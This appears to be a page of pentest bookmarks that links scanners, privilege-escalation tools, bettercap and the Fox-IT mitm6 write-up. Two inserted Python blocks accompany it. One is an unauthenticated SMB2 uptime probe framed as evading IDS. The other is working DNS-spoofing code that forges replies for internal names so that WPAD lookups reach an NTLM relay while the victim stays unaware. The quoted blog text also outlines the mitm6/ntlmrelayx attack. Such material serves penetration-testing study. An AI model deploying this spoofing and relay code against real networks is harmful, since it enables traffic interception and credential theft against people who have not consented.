pentest   3240


smb2-vuln-uptime NSE Script
Attempts to detect missing patches in Windows systems by checking the uptime returned during the SMB2 protocol negotiation.

SMB2 protocol negotiation response returns the system boot time pre-authentication. This information can be used to determine if a system is missing critical patches without triggering IDS/IPS/AVs.

Remember that a rebooted system may still be vulnerable: the check only infers missing patches from the reported uptime, and no additional probes are sent.
smb  pentest  nmap  nse  vulnerability  scanner 
yesterday by whip_lash
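The check described above, as an added Python illustration rather than the NSE script's own Lua code: it builds the same pre-authentication SMB2 NEGOTIATE request, parses the SystemTime and ServerStartTime fields from the reply, and turns the boot time into a verdict against a patch release date. The sample timestamps and the patch date are constructed for the offline demo (they are not real patch dates), `probe()` is the live variant over TCP 445, and a server that reports a zero ServerStartTime is treated as unknown instead of being flagged, an assumption about non-Windows implementations.

```python
import socket
import struct
from datetime import datetime, timedelta, timezone

# FILETIME counts 100 ns ticks since 1601-01-01 UTC; this is the tick offset to the Unix epoch.
FILETIME_UNIX_OFFSET = 116444736000000000
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000

# Constructed values for the offline demo; not real hosts or patch dates.
SAMPLE_SYSTEM_TIME = datetime(2018, 1, 20, 12, 0, tzinfo=timezone.utc)
SAMPLE_BOOT_TIME = datetime(2017, 10, 1, 0, 0, tzinfo=timezone.utc)
SAMPLE_PATCH_RELEASE = datetime(2017, 11, 14, tzinfo=timezone.utc)  # hypothetical


def filetime_to_datetime(ticks):
    return UNIX_EPOCH + timedelta(microseconds=(ticks - FILETIME_UNIX_OFFSET) // 10)


def datetime_to_filetime(dt):
    return int((dt - UNIX_EPOCH).total_seconds()) * 10_000_000 + FILETIME_UNIX_OFFSET


def smb2_header(command, message_id=0):
    # 64-byte header: ProtocolId, StructureSize, CreditCharge, Status, Command,
    # Credits, Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
    return struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0, command, 1,
                       0, 0, message_id, 0, 0, 0, b"\x00" * 16)


def build_negotiate_request(dialects=(0x0202, 0x0210)):
    # Body: StructureSize (fixed 36), DialectCount, SecurityMode (signing enabled),
    # Reserved, Capabilities, ClientGuid, ClientStartTime, then the dialect list
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), 1, 0, 0, b"\x00" * 16, 0)
    return smb2_header(SMB2_NEGOTIATE) + body + b"".join(struct.pack("<H", d) for d in dialects)


def parse_negotiate_response(data):
    """Return (dialect, server SystemTime, ServerStartTime or None) from a raw reply."""
    if len(data) < 128 or data[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    status, command = struct.unpack_from("<IH", data, 8)
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError("not a successful NEGOTIATE response")
    body = data[64:]
    # Body: StructureSize(2) SecurityMode(2) DialectRevision(2) Reserved(2) ServerGuid(16)
    # Capabilities(4) MaxTransact(4) MaxRead(4) MaxWrite(4) SystemTime(8) ServerStartTime(8) ...
    structure_size, _, dialect = struct.unpack_from("<HHH", body, 0)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response size")
    system_ft, start_ft = struct.unpack_from("<QQ", body, 40)
    # Assumption: a zero ServerStartTime means the server did not disclose its boot
    # time (seen on non-Windows servers); report unknown rather than a 1601 boot.
    boot = filetime_to_datetime(start_ft) if start_ft else None
    return dialect, filetime_to_datetime(system_ft), boot


def build_negotiate_response(system_time, boot_time, dialect=0x0210):
    """Constructed server reply so the example runs offline; same layout as parsed above."""
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, 1, dialect, 0, b"\x00" * 16, 0,
                       0x800000, 0x800000, 0x800000, datetime_to_filetime(system_time),
                       datetime_to_filetime(boot_time) if boot_time else 0, 128, 0, 0)
    return smb2_header(SMB2_NEGOTIATE) + body


def assess(system_time, boot_time, patch_release):
    """Uptime-only verdict: a host booted before a reboot-requiring patch was published
    cannot be running that patch; a reboot after the release proves nothing either way."""
    if boot_time is None:
        return "unknown: server did not report ServerStartTime"
    uptime_days = (system_time - boot_time).days
    if boot_time < patch_release:
        return "possibly unpatched: up %d days, booted before %s" % (uptime_days, patch_release.date())
    return "rebooted after %s (%d days up); may still be unpatched" % (patch_release.date(), uptime_days)


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed early")
        buf += chunk
    return buf


def probe(host, port=445, timeout=5.0):
    """Live check: one NEGOTIATE over direct TCP 445 (4-byte length prefix), no authentication."""
    req = build_negotiate_request()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(struct.pack(">I", len(req)) + req)
        length = struct.unpack(">I", _recv_exact(s, 4))[0] & 0x00FFFFFF
        return parse_negotiate_response(_recv_exact(s, length))


if __name__ == "__main__":
    dialect, now, boot = parse_negotiate_response(
        build_negotiate_response(SAMPLE_SYSTEM_TIME, SAMPLE_BOOT_TIME))
    print("dialect 0x%04x, booted %s: %s" % (dialect, boot, assess(now, boot, SAMPLE_PATCH_RELEASE)))
```

The verdict deliberately mirrors the caveat in the description: only "booted before the release" is evidence, and even that is evidence of a missing reboot-requiring patch, not proof of a specific vulnerability.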
http-form-brute NSE Script
Performs brute force password auditing against http form-based authentication.
nmap  nse  pentest  webapp  bruteforce 
yesterday by whip_lash
GitHub - dzonerzy/winescalation: Python based module to find common vulnerabilities which lead to Windows privilege escalation
This is a Python-based module for fast checking of common vulnerabilities affecting Windows which lead to privilege escalation.
python  windows  privilegeescalation  privesc  pentest  security 
2 days ago by whip_lash
evilsocket/bettercap: A complete, modular, portable and easily extensible MITM framework.
bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.
github  security  pentest  mitm 
3 days ago by whip_lash
mitm6 – compromising IPv4 networks via IPv6 | Fox-IT International blog
Running the attack itself is quite straightforward. First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network. For the second part of our attack, we use our favorite relaying tool, ntlmrelayx. This tool is part of the impacket Python library by Core Security and is an improvement on the well-known smbrelayx tool, supporting several protocols to relay to. Core Security and Fox-IT recently worked together on improving ntlmrelayx, adding several new features which (among others) enable it to relay via IPv6, serve the WPAD file, automatically detect proxy requests and prompt the victim for the correct authentication. If you want to check out some of the new features, have a look at the relay-experimental branch.

To serve the WPAD file, all we need to add to the command prompt is the -wh parameter, with which we specify the host that the WPAD file resides on. Since mitm6 gives us control over the DNS, any non-existing hostname in the victim network will do. To make sure ntlmrelayx listens on both IPv4 and IPv6, use the -6 parameter. The screenshots below show both tools in action, mitm6 selectively spoofing DNS replies and ntlmrelayx serving the WPAD file and then relaying authentication to other servers in the network.

hash  relay  ipv6  mitm  pentest  security 
6 days ago by whip_lash
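The "selectively spoofing DNS replies" step from the Fox-IT write-up, as an added Python illustration that is not mitm6's or impacket's own code: once the victim has taken the attacker as its DNS server via DHCPv6, only queries for names inside the internal domain get a forged answer pointing at the attacker's IPv6 address (so the WPAD hostname resolves to the relay), while everything else is left alone so the victim's normal resolution keeps working. The domain `corp.local`, the WPAD hostname and the attacker address `fd00::1` are constructed for the demo.

```python
import ipaddress
import struct

TYPE_A, TYPE_AAAA = 1, 28
CLASS_IN = 1


def encode_name(name):
    """Encode a dotted hostname as DNS wire-format labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(packet, offset):
    """Decode a name at offset, following compression pointers; return (name, end_offset)."""
    labels, jumped, end = [], False, offset
    while True:
        length = packet[offset]
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            pointer = struct.unpack_from(">H", packet, offset)[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    if not jumped:
        end = offset
    return ".".join(labels), end


def build_query(txid, qname, qtype):
    """Constructed client query, i.e. what the victim sends to its (now attacker) DNS server."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    return header + encode_name(qname) + struct.pack(">HH", qtype, CLASS_IN)


def parse_query(packet):
    txid, flags, qdcount = struct.unpack_from(">HHH", packet, 0)
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("expected a single-question query")
    qname, end = decode_name(packet, 12)
    qtype, qclass = struct.unpack_from(">HH", packet, end)
    return txid, qname, qtype, qclass, packet[12:end + 4]


def in_target_domain(qname, domain):
    q, d = qname.lower().rstrip("."), domain.lower().rstrip(".")
    return q == d or q.endswith("." + d)


def spoofed_reply(packet, target_domain, attacker_ip, ttl=100):
    """Forge an answer for names inside target_domain; return None for anything else
    (and for address families the attacker address cannot satisfy) so it is passed through."""
    txid, qname, qtype, qclass, question = parse_query(packet)
    ip = ipaddress.ip_address(attacker_ip)
    if qclass != CLASS_IN or not in_target_domain(qname, target_domain):
        return None
    if (qtype, ip.version) not in ((TYPE_A, 4), (TYPE_AAAA, 6)):
        return None
    header = struct.pack(">HHHHHH", txid, 0x8580, 1, 1, 0, 0)  # QR, AA, RD, RA; one answer
    answer = struct.pack(">HHHIH", 0xC00C, qtype, CLASS_IN, ttl, len(ip.packed)) + ip.packed
    return header + question + answer


def answer_address(reply):
    """Read back the single answer's address from a reply built by spoofed_reply()."""
    _, end = decode_name(reply, 12)
    ans = end + 4  # skip QTYPE and QCLASS of the echoed question
    _, _, _, _, rdlen = struct.unpack_from(">HHHIH", reply, ans)
    return str(ipaddress.ip_address(reply[ans + 12:ans + 12 + rdlen]))


if __name__ == "__main__":
    for name, qtype in (("wpad.corp.local", TYPE_AAAA), ("update.example.net", TYPE_AAAA)):
        reply = spoofed_reply(build_query(0x1234, name, qtype), "corp.local", "fd00::1")
        print(name, "->", answer_address(reply) if reply else "pass through")
```

The point of the filter is operational as much as technical: answering every query with the attacker's address would break the victim's internet access and get noticed, whereas answering only for internal names (including the non-existent WPAD host handed to ntlmrelayx with -wh) keeps the victim working while its proxy lookups land on the relay.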
10 common mistakes aspiring/new pentesters make – PentesterLab
Reversing and writing exploits are amazing things to do and you should definitely look into these two domains. However, if you want to break into infosec and score your first job, you need to be good at web (and mobile and network to a lesser extent) security. Most pentesting companies have a lot of their workload composed of web testing and this is not going to change in the next few months. Furthermore, they also have senior people who are dying to do more research and will probably have priority on all the reversing/exploit writing jobs. So if you want to increase your likelihood of getting hired, you need to become a gun at web pentesting.

pentest  jobs  career 
7 days ago by whip_lash
MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected.
security  mitre  dfir  pentest  reference  ttp 
9 days ago by plaxx


